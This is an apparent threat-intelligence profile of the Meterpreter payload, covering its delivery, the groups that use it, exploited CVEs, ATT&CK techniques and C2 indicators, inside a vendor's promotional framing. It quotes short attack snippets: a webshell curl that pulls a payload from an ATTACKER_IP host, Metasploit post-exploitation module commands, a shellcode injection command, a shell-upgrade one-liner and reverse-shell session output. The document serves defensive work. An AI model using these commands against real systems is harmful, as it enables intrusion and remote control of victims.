Meterpreter
Meterpreter is the Metasploit Framework’s interactive payload and shell/backdoor component, commonly used as a reverse shell or staged payload for remote command execution and post-exploitation. The content explicitly describes it as a popular reverse shell within Metasploit and as a malicious agent used to manage and control victim computers. Observed forms include Windows and Linux reverse TCP payloads such as windows/meterpreter/reverse_tcp, linux/x86/meterpreter/reverse_tcp, and SMB-based variants. The content also notes Meterpreter can be delivered as a stager that establishes an initial foothold and downloads more advanced components later.
Capabilities directly mentioned in the content include remote command execution, use as a backdoor, and post-compromise control. Meterpreter is also referenced in conjunction with privilege-escalation tradecraft such as the Metasploit getsystem functionality, including named-pipe impersonation, rundll32-based DLL execution, and token manipulation. Linux-focused detection content associates Meterpreter activity with reconnaissance of files such as /etc/machine-id, /etc/passwd, /proc/net/route, /proc/net/ipv6_route, and /proc/net/if_inet6, and with payload behavior involving RWX memory regions.
Infection and delivery vectors mentioned in the content include phishing documents with malicious macros that download and execute a Meterpreter stager; fake software or game-related lures such as a Fortnite "multitool" executable that dropped a Meterpreter backdoor; malware packers; shellcode loaders; and deployment as an additional payload by other malware families and intrusion sets. Proofpoint observed Bumblebee dropping Meterpreter, and multiple reports describe Meterpreter being sent as a task or secondary payload alongside tools such as Cobalt Strike, Sliver, njRAT, Luminosity Link RAT, and custom downloaders.
Threat actor and campaign associations explicitly mentioned include DarkHotel, which separated a Meterpreter remote-control component from functional modules such as keylogging, screen capture, and USB theft; DragonSpark, where execution of m6699.exe or ShellCode_Loader enabled a Meterpreter session for remote command execution; Lebanese Cedar, which used Meterpreter with Explosive RAT to maintain access and steal legitimate network credentials for espionage; Transparent Tribe / Operation Transparent Tribe, where Meterpreter appeared among the toolset used against Indian diplomatic and military targets; Mustang Panda, which used Meterpreter-based shellcode and a Meterpreter stager in phishing campaigns; and Hive0065 / TA505, where attackers installed Meterpreter reverse and bind shells on compromised systems. The content also references Meterpreter-like payloads in the SEO#LURKER campaign and use through SYSTEMBC shellcode injection.
Targeting reflected in the associated reporting includes government, military, diplomatic, telecommunications, research, and enterprise environments, as well as opportunistic victims reached through phishing and trojanized software. Known indicators directly mentioned in the content include the IP address 81.19.135[.]241 identified as a Meterpreter C2 and OpenVPN server, reverse-shell connections to 91.214.124[.]20 and 91.214.124[.]25 in TA505-linked activity, and the JA3 fingerprint 5d65ea3fb1d4aa7d826733d2f2cbbb1d for Metasploit Meterpreter running on Linux.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
11 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization. These are tracked as CVE-2022-31794 and CVE-2022-31795
'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' } ... 'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
On the 6th of April 2022, NCC Group’s Fox-IT discovered two separate flaws in FUJITSU CentricStor Control Center V8.1 which allows an attacker to gain remote code execution on the appliance without prior authentication or authorization. These are tracked as CVE-2022-31794 and CVE-2022-31795
WICKED PANDA ... began 2020 by conducting a wide-ranging campaign focused on exploiting multiple vulnerabilities (CVE-2019-19781 and CVE-2020-10189) ... deployed Cobalt Strike and Meterpreter payloads
WICKED PANDA ... began 2020 by conducting a wide-ranging campaign focused on exploiting multiple vulnerabilities (CVE-2019-19781 and CVE-2020-10189) ... Upon successful exploitation, they deployed Cobalt Strike and Meterpreter payloads
It triggers on error messages indicating the print spooler failed to load a plug-in module, such as "meterpreter.dll," with error code 0x45A. | The following analytic detects driver load errors in the Windows PrintService Admin logs, specifically identifying issues related to CVE-2021-34527 (PrintNightmare). It triggers on error messages indicating the print spooler failed to load a plug-in module, such as "meterpreter.dll," with error code 0x45A.
Metasploit uses printf to write the Meterpreter stager to disk in 20ish byte chunks (each exploit attempt must fit within a 26 byte buffer), which is quite slow.
Table 1: Filenames and hashes of files used by a threat actor Filename MD5 t.py (tied to scheduled task, python meterpreter reverse shell port 9090) ... g.py (tied to scheduled task, python meterpreter reverse shell port 8088) ...
Analysts confirmed that nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network. This vulnerability allows for remote code execution on the ManageEngine application.
A threat actor exploited CVE-2023-46604 on an internet-facing Apache ActiveMQ server... The threat actor was able to perform remote code execution (RCE) by using a Java Spring class and a custom Java Spring bean configuration XML file.
Threat actors are actively exploiting a recently disclosed critical vulnerability, tracked as CVE-2026-1731 (CVSS score: 9.9), in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA). The bug could allow an unauthenticated attacker to send specially crafted requests and run operating system commands remotely, without logging in.
Groups observed using it
24 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Compared to previous attack activities of this organization, this time DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
Further use of Meterpreter and their custom Explosive RAT have been associated with objectives around maintaining access through theft of legitimate network credentials, ultimately pursuing espionage objectives.
Tools: SpicyOmelette, Cobalt Strike, Meterpreter, Mimikatz, CobtInt, ATMSpitter, Carbanak, Buhtrap, Cyst, Metasploit.
AhnLab reported that the Kimsuky group has used a Go language version of Meterpreter, and subsequent discoveries include additional Go-based malware like Troll Stealer and GoBear.
AhnLab reported that the Kimsuky group has used a Go language version of Meterpreter, and subsequent discoveries include additional Go-based malware like Troll Stealer and GoBear.
Cinnamon Tempest has used open-source tools including customized versions of the Iox proxy tool, NPS tunneling tool, Meterpreter, and a keylogger that uploads data to Alibaba cloud storage.
Techniques & procedures
37 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
4 techniques
Initial Access
DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
use auxiliary/scanner/smb/smb_login CreateSession true sessions -u <smb_session_id> use post/windows/manage/smb_to_meterpreter
Execution
9 techniques
Execution
C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator.
If you want to use the script in PowerShell Empire, then you can run it on the agent by switching to the command line (shell) mode.
Trigger via the webshell: curl "http:// < TARGET_IP > :8080/site/index.php?page=http:// < ATTACKER_IP > :8000/cmd.php&cmd=powershell+-enc+ < BASE64_PAYLOAD > "
We have a Meterpreter session as www-data. Upgrading to a Full Shell ... meterpreter > shell ... python -c 'import pty; pty.spawn("/bin/bash")'
Running oledump.py shows that the document contains macros... Olevba analyzes VBA macros and shows suspicious behavior such as auto-execution, obfuscation, and network activity.
In the analyzer you can see perl being leveraged to create and populate the jBNhk payload in the /tmp directory (with RWX permissions) and spawning a reverse Meterpreter shell.
When the user enabled macros, the document downloaded an executable named IPhone.exe from the same fake website. Then the executable was launched.
Persistence
4 techniques
Persistence
C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator.
use auxiliary/scanner/smb/smb_login CreateSession true sessions -u <smb_session_id> use post/windows/manage/smb_to_meterpreter
Privilege Escalation
4 techniques
Privilege Escalation
C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator.
Back on Havoc, we’ll use the shellcode command with the architecture and the PID from our SYSTEM beacon. shellcode inject x64 PID# /home/kali/Desktop/msf.bin ... And with the shellcode successfully injected, we get a meterpreter shell back
Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload. | In addition to these methods, both tools also support a third method that involves token manipulation.
Stealth
7 techniques
Stealth
You can also see an obfuscated VBA string that resembles Base64-encoded data.
The attacker embedded a list of files to be decrypted, all of which were encrypted ciphertexts... The first three types need to be decrypted using the same algorithm and key.
Back on Havoc, we’ll use the shellcode command with the architecture and the PID from our SYSTEM beacon. shellcode inject x64 PID# /home/kali/Desktop/msf.bin ... And with the shellcode successfully injected, we get a meterpreter shell back
Both tools first attempt to use “named pipe impersonation” to achieve SYSTEM privileges. This involves creating a Windows Service to execute as NT AUTHORITY\SYSTEM and feeding data to it through a named pipe that is randomly created by the malicious payload. | In addition to these methods, both tools also support a third method that involves token manipulation.
The second GetSystem method uses rundll32.exe and a few hardcoded command line options to execute a DLL for privilege escalation. Thankfully, the command line options are consistent and appear similar to this: rundll32.exe C:\Users\user\AppData\Local\Temp\fvxens.dll,a /p:fvxens
icacls confirms every authenticated user has full control over the binary. Replace it with a Meterpreter payload and wait for the scheduler to complete the chain.
The mprotect() system call is used to change the access protections on a region of memory that has already been allocated... Our aim with this detection rule is to detect network connections from binaries that have read, write and execute memory region permissions set.
Credential Access
2 techniques
Credential Access
Discovery
5 techniques
Discovery
Executes the shell “ ifconfig ” command. The expect routine looks for a string containing “+” as an indication of success.
Executes the shell “ whoami ” command. The expect routine looks for a string containing “Logon ID:” as an indication of success.
Executes the shell “ netstat ” command. The expect routine checks for a string containing the word “Protocol” as an indication of success.
Lateral Movement
2 techniques
Lateral Movement
Collection
4 techniques
Collection
DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
DarkHotel has separated the remote control component (meterpreter) from functional components (keyboard logging, screen capture, and USB theft) for separate loading and operation.
Command and Control
5 techniques
Command and Control
Hunting C2/Adversaries Infrastructure with Shodan and Censys ... My research Cobalt Strike C2 Metasploit/MSF Covenant C2 Deimos C2 Posh C2 Brute Ratel C4 Mythic C2 Sliver C2 ... Night Hawk C2 NimPlant C2 ShadowPad C2 Infrastructure Async Rat C2 Infrastructure Meterpreter C2 Infrastructure
[*] Started reverse TCP handler on 192.168.159.128:4444 ... [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49766)
A hidden feature of Metasploit, is the ability to add SMB Named Pipe listeners in a meterpreter session to pivot on an internal network. | In the same way as a port forward pivot is set up, your meterpreter session registers a named pipe, and listens to connections to this. After it has been configured, your meterpreter session acts as a listener for SMB connections.
IOCs tracked for this family
89 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
116 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Meterpreter is referenced as a Metasploit payload used for remote shell/access sessions.
Meterpreter is a Metasploit payload used for interactive remote access and post-exploitation on compromised systems.
Meterpreter is used here as a reverse TCP payload generated with msfvenom to provide remote shell access from an internal Windows host back to the attacker through port forwarding.
A lightweight stager payload that establishes initial remote access to a compromised system and can download more advanced components later.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.